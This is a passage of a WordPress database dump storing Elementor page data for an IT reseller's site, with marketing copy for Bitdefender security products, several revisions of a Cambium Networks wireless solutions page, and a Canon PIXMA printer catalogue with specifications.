Endpoints <\\/strong><\\/h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a1147c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2e7e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Advanced Business Security <\\/strong><\\/h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c510a4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8f6037c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebef62d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6772,3281,'_elementor_version','0.4'),(6775,1451,'_elementor_edit_mode','builder'),(6776,1451,'_elementor_template_type','post'),(6777,1451,'_elementor_version','2.5.14'),(6778,1451,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6779,3282,'_wp_page_template','template-fullwidth.php'),(6780,3282,'_elementor_edit_mode','builder'),(6781,3282,'_elementor_template_type','post'),(6782,3282,'_elementor_version','2.5.14'),(6783,3282,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6793,3284,'_wp_page_template','template-fullwidth.php'),(6786,3283,'_wp_page_template','template-fullwidth.php'),(6787,3283,'_elementor_edit_mode','builder'),(6788,3283,'_elementor_template_type','post'),(6789,3283,'_elementor_version','2.5.14'),(6790,3283,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><center><\\/center><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6794,3284,'_elementor_edit_mode','builder'),(6795,3284,'_elementor_template_type','post'),(6796,3284,'_elementor_version','2.5.14'),(6797,3284,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6800,3285,'_wp_page_template','template-fullwidth.php'),(6801,3285,'_elementor_edit_mode','builder'),(6802,3285,'_elementor_template_type','post'),(6803,3285,'_elementor_version','2.5.14'),(6804,3285,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2>\\n&nbsp;\\n<h3><strong>Local Government<\\/strong><\\/h3>\\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\\n<h3><strong>Higher Education<\\/strong><\\/h3>\\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\\n<h3><strong>Regional Service Providers<\\/strong><\\/h3>\\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\\n<h3><strong>Oil and Gas<\\/strong><\\/h3>\\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\\n<h3><strong>Small Medium Business Retail<\\/strong><\\/h3>\\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\\n<h3><strong>Managed Service Providers<\\/strong><\\/h3>\\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.\\n<h3><strong>Federal Government<\\/strong><\\/h3>\\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\\n<h3><strong>Retail<\\/strong><\\/h3>\\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\\n<h3><strong>Smart Cities<\\/strong><\\/h3>\\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.\\n\\n&nbsp;\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6807,3286,'_wp_page_template','template-fullwidth.php'),(6808,3286,'_elementor_edit_mode','builder'),(6809,3286,'_elementor_template_type','post'),(6810,3286,'_elementor_version','2.5.14'),(6811,3286,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><center><\\/center><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6814,3287,'_wp_page_template','template-fullwidth.php'),(6815,3287,'_elementor_edit_mode','builder'),(6816,3287,'_elementor_template_type','post'),(6817,3287,'_elementor_version','2.5.14'),(6818,3287,'_elementor_data','[{\"id\":\"40d5ffe3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1d6229fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"740df10a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Solutions for all your wireless needs<\\/h2><p>\\u00a0<\\/p><h3><strong>Local Government<\\/strong><\\/h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.<\\/p><h3><strong>Higher Education<\\/strong><\\/h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.<\\/p><h3><strong>Regional Service Providers<\\/strong><\\/h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.<\\/p><h3><strong>Oil and Gas<\\/strong><\\/h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.<\\/p><h3><strong>Small Medium Business Retail<\\/strong><\\/h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.<\\/p><h3><strong>Managed Service Providers<\\/strong><\\/h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clients\\u2019 bottom lines.<\\/p><h3><strong>Federal Government<\\/strong><\\/h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.<\\/p><h3><strong>Retail<\\/strong><\\/h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience<\\/p><h3><strong>Smart Cities<\\/strong><\\/h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6830,3289,'_elementor_template_type','post'),(6831,3289,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\\n\\nThe Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\\n\\nAvailable in Black and Red.\\n\\nPrint, Scan, Copy\\n\\nISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour\\n\\nHi-speed USB 2.0, WiFi\\n\\nRecommended print volume: 80 - 400 pages\\n\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\\n\\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\\n\\nPrint, Scan, Copy, Fax\\n\\nISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour\\n\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\\n\\nRecommended print volume: 50 - 200 pages\\n\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton 